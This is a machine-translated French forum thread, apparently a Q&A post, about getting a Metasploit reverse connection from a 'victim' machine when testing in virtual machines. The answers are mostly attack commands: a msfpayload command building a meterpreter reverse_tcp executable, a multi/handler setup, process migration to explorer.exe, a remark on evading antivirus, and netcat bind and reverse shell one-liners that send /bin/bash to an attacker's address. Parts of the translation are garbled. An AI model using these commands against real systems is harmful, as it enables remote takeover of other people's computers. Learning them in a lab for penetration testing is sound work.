mSFCONSOLE est un outil de pentestes opensource cool de metasploit
.
Une fois que l'exploit est valide, nous pouvons définir une charge utile sur la victime. Pour la connexion persistante, nous aurons peut-être besoin de compteur de compteur.
Mais nous testons souvent la sécurité dans des machines virtuelles exécutant MSFCONSOLE.
Sans IP publique, le PC de la victime peut-il revenir à notre serveur local en VMS?
Quelques suggestions?
Sachant que vous utilisez Metasploit est un bon signe, il suffit de pointer cela.
Premièrement, vous devez créer une charge utile en procédant comme suit:
msfpayload windows/metepreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe
Ensuite, procédez comme suit en ordre par numéro lorsque vous tapez dans le terminal:
1. msfconsole
2. use exploit/multi/handler
3. set PAYLOAD windows/meterpreter/reverse_tcp
4. set LHOST "ip you used when creating the payload in the first step without quotations"
5. set LPORT "port you used when creating the payload in the first step without quotations"
6. exploit
Après que vous tapez exploit, et si vous suivez correctement, vous recevrez un message dans le terminal comme celui-ci:
[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...
Maintenant, avec la charge utile que vous avez créée dans la première étape, vous souhaitez l'exécuter sur la machine que vous classez comme "victime". Bien sûr, cela ne fonctionnera pas si vous avez un antivirus car il (la charge utile) n'a pas été crypté par un crypter ou codé avec un code indésirable pour masquer la charge utile. Une fois que vous avez exécuté la charge utile sur l'ordinateur de la victime, vous obtiendrez une session meterpreter
au sein de votre terminal.
Lorsque vous êtes dans la session meterpreter
, la première chose à faire est de migrer vers explorer.exe et vous pouvez le faire en tapant ce qui suit dans votre terminal:
ps (shows the current running processes on the computer with a number ID on the left of it)
migrate (id of Explorer.exe)
Amusez-vous avec votre session MeterPreter.
Sans IP publique, le PC de la victime peut-il revenir à notre serveur local en VMS?
C'est possible, mais cela dépend. Si votre adresse IP de votre ordinateur VM est locale sur votre ordinateur, il s'attribuera généralement à un 198
IP. C'est ce qui arrive toujours avec moi quand même, c'est donc rendu inutile à la "victime" puisqu'il s'agit d'une adresse IP locale. Si vous ne cryptez pas votre connexion TCP via VPN en tant que telle et la victime a la bonne connaissance disons, il peut afficher ses journaux de connexion, voir ses connexions ingérées et sortantes, et vos connexions ne sont pas cryptées. Et votre adresse IP publique est en vue de nature, il peut être capable de [~ # ~ # ~] dox [~ # ~] ou réaliser des informations avec la méthode qu'il/elle sait.
J'espère que cela pourra aider.
Autant que je sache, vous pouvez configurer votre VM afin que le système d'exploitation invité partage l'interface réseau physique avec l'hôte. Dans ce cas si vous commencez
NC -NLVP 8080
l'auditeur écoute également vers le monde extérieur. Cela devrait faire l'affaire.
bind Shell: Cela vous permet de définir un port pour écouter sur votre connexion locale pour les ports entrants. nc -nvlp 8080 -e /bin/bash
... Cela devrait ouvrir une connexion à un environnement Bash une fois qu'une machine distante se connecte à son adresse IP réseau.
Coquille inverse: configurez une coque de liaison sur votre propre machine sans la -e/bin/bash ... puis exécutez nc -nv YOUR.IP.ADDR.HERE 8080 -e /bin/bash
sur la machine VICTUM.
on dirait que l'une de vos connexions est derrière un nat? et donc pas d'adresse IP? Si cela est vrai, vous devez configurer le nc -nvlp 8080
Sur quel que soit l'emplacement d'une adresse IP, vous pouvez travailler avec.
Je sais que vous avez dit métasploit, mais c'est un bon moyen d'expliquer et de comprendre les différences de connexion.
donc, avec métasploit, vous pouvez essayer une charge utile reverse_tcp ou une charge utile BIND_TCP